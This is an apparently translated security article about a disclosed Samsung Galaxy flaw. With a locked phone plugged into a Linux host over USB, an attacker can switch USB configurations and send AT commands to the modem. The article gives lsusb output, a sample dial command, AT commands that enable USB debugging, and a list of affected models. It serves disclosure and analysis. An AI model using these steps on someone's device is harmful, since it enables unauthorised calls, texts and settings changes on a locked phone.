Technical analysis: lockscreen bypass, Samsung Galaxy series phones can also be called out
Recently, two security researchers, Robert to Paleari and Aristide Fattori, released technical details about the security vulnerabilities of Samsung Galaxy mobile devices. It is said that Galaxy mobile phones can be used by unauthorized third-party personnel to send out-of-call calls and text messages when locked.
Overview of lock bypass
According to the technical details released by Robert Paleari and Aristide Fattori, attackers can use temporary access to mobile devices or steal mobile phones of victims, connect the mobile phone device to the Linux operating platform through USB, and send commands to send telephone calls and text messages.
This method does not take advantage of any software vulnerabilities. Even if the USB debugging function (ADB, Android debugging bridge, can help users manage the device or simulator status) or USB network sharing function is disabled on the mobile phone, the above call and text message can also be sent.
How it works
The core problem with this vulnerability is that when a mobile phone is connected to another Linux system via USB, generally, you can use the virtual USB serial port of the Linux system (mainly/dev/ttyACM0 device) to communicate with the mobile phone device.
According to the test, when connected to a USB controller (such as a normal laptop), a serial interface is exposed for Samsung Galaxy mobile phones, by using this interface, we can communicate with the USB modem of the mobile phone.
"Easy" mode (for old Samsung mobile phones and firmware versions)
For old Samsung phones and firmware versions such as GT-I9192 (Samsung S4 Mini, version No. I9192XXUBNB1), after connecting the phone to a Linux host, confirm that the interface is connected to the USB Modem, you can try to send the AT (Attention) command. According to the analysis, some commands will be passed to the baseband Modem, while other commands will be processed by the user space application.
The above interface is used to run and transmit simple AT (Attention) commands. In theory, a skilled attacker can execute various operations on mobile devices.
Freebuf encyclopedia
AT, called Attention, was invented by Hayes. The AT Instruction Set allows computers or terminals to communicate with Modem. Send AT commands to control the functions of the mobile station and interact with GSM network services. You can use AT commands to control calls, text messages, phone books, data services, and faxes.
Hard Mode (for new Samsung mobile phones and firmware versions)
However, in recent firmware versions (such as the latest Samsung S4 and Samsung S6 versions), it is not that easy to exploit this vulnerability, because in the latest firmware version, the default configuration is that when the device is connected to the host, only the MTP interface is enabled for the host, which is mainly used for file transmission.
However, after testing, we found that attackers can still communicate with Modem by switching the default configuration to the second USB configuration. Therefore, in this case, the attacker needs to switch the default configuration to USB configuration #2 before connecting to the Modem. This operation can be achieved through the PC terminal without unlocking the mobile phone device. The following is the default configuration information,
$ lsusb -v...Bus 001 Device 007: ID 04e8:6860 Samsung Electronics Co., Ltd Galaxy (MTP)Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.00 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x04e8 Samsung Electronics Co., Ltd idProduct 0x6860 Galaxy (MTP) ... bNumConfigurations 2 Configuration Descriptor: ... Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 0 bAlternateSetting 0 bNumEndpoints 3 bInterfaceClass 6 Imaging bInterfaceSubClass 1 Still Image Capture bInterfaceProtocol 1 Picture Transfer Protocol (PIMA 15470) iInterface 5 MTP ... Configuration Descriptor: bLength 9 bDescriptorType 2 wTotalLength 105 bNumInterfaces 3 bConfigurationValue 2 iConfiguration 0 bmAttributes 0xc0 Self Powered MaxPower 96mA ... Interface Descriptor: bLength 9 bDescriptorType 4 bInterfaceNumber 1 bAlternateSetting 0 bNumEndpoints 1 bInterfaceClass 2 Communications bInterfaceSubClass 2 Abstract (modem) bInterfaceProtocol 1 AT-commands (v.25ter) iInterface 6 CDC Abstract Control Model (ACM) ...
In this PoC, we developed a simple tool (written in C) called usbswitcher. With this tool, we can switch the specified SamSung mobile device to USB configuration #2. The tool uses the libusb library to implement the above functions. For the same task, we can also use the/sys/bus/usb Virtual File System.
The process of force phone switching configuration is to reset the USB device first (implemented through the usb_reset () function), and then switch the configuration (implemented through the set_configuration () function ). Sometimes, the first execution of the USB switcher tool may not take effect, so it is best to run it twice to ensure that the configuration has been switched over. The Source Code address of the tool usbswitcher is: usbswitcher. c.
Test Results
We know that the most obvious consequence of access to Modem is the possibility of making calls and sending text messages. For the former, that is, the outgoing call, you can use the following command:
ATD + 123456;
This command is mainly used to dial the phone number 123456 in the lock status. Some friends asked if they could use this vulnerability to obtain Device Access Permissions, such as access to their address book, photos, and internal storage? In theory, the AT command can be directly processed by the baseband processor. However, as we mentioned earlier, some AT commands may be parsed by user space applications. In this case, the baseband processor cannot process the commands, so it cannot directly implement the access permissions mentioned above.
In this test, we observe that S4 mini (firmware version number is I9192XXUBNB1) supports some AT commands that can be used to control the settings of the Android system. For example, the AT + usb debug command allows you to Enable USB debugging, And the AT + WIFIVALUE command allows you to enable or disable Wi-Fi for devices.
In recent versions of Mobile Phone firmware, Samsung may be aware of the risks related to such commands. It began to introduce a blacklist-based filtering mechanism (executed by the ddexe binary application ), used to filter out threatening commands. For example, when the AT + UsbDebug command is passed during the test, we can see that the following information is recorded in the system log of the Galaxy S6 device,
D/DataRouter (302): write [151] bytes of data to USB fd [9]
D/DataRouter (0, 302): After the usb select
D/DataRouter (302): read usb data [len: 12]
D/DataRouter (302): read usb data message: AT + USBDEBUG
D/DataRouter (302): Not allowed AT cmd !! # AT command execution not allowed
D/DataRouter (302): Before the usb select
Impact Scope
Currently, the device types that have been tested and can perform the operations described above include:
SM-G920F, version No.: G920FXXU2COH2 (Galaxy S6)
SM-N9005, version No.: N9005XXUGBOK6 (Galaxy Note 3)
GT-I9192, version No.: 9192XXUBNB1 (Galaxy S4 mini)
GT-I9195, version No.: I9195XXUCOL1 (Galaxy S4 mini LTE)
GT-I9505, version No.: I9505XXUHOJ2 (Galaxy S4)